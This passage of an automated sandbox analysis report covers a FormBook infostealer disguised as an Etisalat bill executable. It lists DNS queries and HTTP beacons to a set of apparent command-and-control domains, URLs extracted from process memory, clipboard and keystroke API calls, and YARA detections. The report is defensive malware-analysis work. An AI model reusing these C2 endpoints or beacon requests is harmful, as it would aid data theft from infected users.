          Source: global trafficHTTP traffic detected: GET /da29/?2dqhl=R2MlVxP8ert&6l=R0vht/u//GQkKJnhnDzhccCvBPqy5ItmLDFelNY6QmkspbEKZfPP+/bGeDfLPfj4cOFx HTTP/1.1Host: www.1wxir.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /da29/?2dqhl=R2MlVxP8ert&6l=IK1SFyt5vgXTEdWXyzXhj/+ddmg0nYKJwLobMWZqnGcsuxwYcVM7IV3LfBY9TbKtfD67 HTTP/1.1Host: www.myconc.proConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficDNS traffic detected: DNS query: www.usedata.monster
          Source: global trafficDNS traffic detected: DNS query: www.vietcadao.com
          Source: global trafficDNS traffic detected: DNS query: www.micheleditrana.com
          Source: global trafficDNS traffic detected: DNS query: www.aerotyneholdings.com
          Source: global trafficDNS traffic detected: DNS query: www.1wxir.com
          Source: global trafficDNS traffic detected: DNS query: www.rlyadventures.com
          Source: global trafficDNS traffic detected: DNS query: www.myconc.pro
          Source: global trafficDNS traffic detected: DNS query: www.flickzbiz.fun
          Source: global trafficDNS traffic detected: DNS query: www.openshiftstore.com
          Source: global trafficDNS traffic detected: DNS query: www.sercettopper.com
          Source: global trafficDNS traffic detected: DNS query: www.kas-travel.com
          Source: explorer.exe, 00000003.00000000.1990524827.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1990524827.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4439803552.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4439803552.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: explorer.exe, 00000003.00000002.4435480864.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1984137614.0000000000F13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
          Source: explorer.exe, 00000003.00000000.1990524827.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1990524827.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4439803552.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4439803552.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: explorer.exe, 00000003.00000000.1990524827.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1990524827.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4439803552.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4439803552.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: explorer.exe, 00000003.00000000.1990524827.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1990524827.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4439803552.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4439803552.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: explorer.exe, 00000003.00000002.4439803552.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1990524827.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
          Source: explorer.exe, 00000003.00000002.4439072490.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4439468324.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4439499553.0000000008890000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.1wxir.com
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.1wxir.com/da29/
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.1wxir.com/da29/www.rlyadventures.com
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.1wxir.comReferer:
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.953700958.com
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.953700958.com/da29/
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.953700958.com/da29/www.iransarafan.com
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.953700958.comReferer:
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aerotyneholdings.com
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aerotyneholdings.com/da29/
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aerotyneholdings.com/da29/www.1wxir.com
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aerotyneholdings.comReferer:
          Source: explorer.exe, 00000003.00000003.3096473322.000000000C85F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1997199712.000000000C861000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1997199712.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096473322.000000000C861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cucinaconestilo.com
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cucinaconestilo.com/da29/
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cucinaconestilo.com/da29/e
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cucinaconestilo.comReferer:
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.flickzbiz.fun
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.flickzbiz.fun/da29/
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.flickzbiz.fun/da29/www.openshiftstore.com
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.flickzbiz.funReferer:
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.iransarafan.com
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.iransarafan.com/da29/
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.iransarafan.com/da29/www.cucinaconestilo.com
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.iransarafan.comReferer:
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kas-travel.com
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kas-travel.com/da29/
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kas-travel.com/da29/www.mediatechnologysolutions.com
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kas-travel.comReferer:
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mediatechnologysolutions.com
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mediatechnologysolutions.com/da29/
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mediatechnologysolutions.com/da29/www.953700958.com
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mediatechnologysolutions.comReferer:
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.micheleditrana.com
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.micheleditrana.com/da29/
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.micheleditrana.com/da29/www.aerotyneholdings.com
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.micheleditrana.comReferer:
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.myconc.pro
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.myconc.pro/da29/
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.myconc.pro/da29/www.flickzbiz.fun
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.myconc.proReferer:
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.openshiftstore.com
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.openshiftstore.com/da29/
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.openshiftstore.com/da29/www.veriosg.xyz
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.openshiftstore.comReferer:
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rlyadventures.com
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rlyadventures.com/da29/
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rlyadventures.com/da29/www.myconc.pro
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rlyadventures.comReferer:
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sercettopper.com
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sercettopper.com/da29/
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sercettopper.com/da29/www.kas-travel.com
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sercettopper.comReferer:
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.usedata.monster
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.usedata.monster/da29/
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.usedata.monster/da29/www.vietcadao.com
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.usedata.monsterReferer:
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.veriosg.xyz
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.veriosg.xyz/da29/
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.veriosg.xyz/da29/www.sercettopper.com
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.veriosg.xyzReferer:
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vietcadao.com
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vietcadao.com/da29/
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vietcadao.com/da29/www.micheleditrana.com
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vietcadao.comReferer:
          Source: explorer.exe, 00000003.00000000.1996092451.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4441907247.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
          Source: explorer.exe, 00000003.00000000.1987574509.00000000076F8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000003.00000000.1990524827.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4439803552.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000003.00000002.4438237252.0000000007637000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1987574509.0000000007637000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000003.00000002.4437215636.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1985931630.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096934333.00000000035FA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.coml
          Source: explorer.exe, 00000003.00000000.1990524827.0000000009BAB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3097350645.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4440374748.0000000009C22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: explorer.exe, 00000003.00000002.4440413157.0000000009C96000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1990524827.0000000009BAB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3095738420.0000000009C92000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
          Source: explorer.exe, 00000003.00000002.4441907247.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1996092451.000000000C460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
          Source: explorer.exe, 00000003.00000002.4439803552.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1990524827.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/)s
          Source: explorer.exe, 00000003.00000002.4439803552.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1990524827.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comon
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00BD425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00BD425A
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00BD4458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00BD4458
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00BD425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00BD425A
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00BC0219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00BC0219
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00BECDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00BECDAC

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Details of Your Etisalat Summary Bill for the Month of May 2024.exe.15f0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Details of Your Etisalat Summary Bill for the Month of May 2024.exe.15f0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.4435483177.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1977959282.00000000015F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.4436014928.0000000004AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2040525225.0000000000850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2040267539.00000000001D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.4435949458.0000000004A90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2040356604.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Details of Your Etisalat Summary Bill for the Month of May 2024.exe.15f0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.Details of Your Etisalat Summary Bill for the Month of May 2024.exe.15f0000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Details of Your Etisalat Summary Bill for the Month of May 2024.exe.15f0000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Details of Your Etisalat Summary Bill for the Month of May 2024.exe.15f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
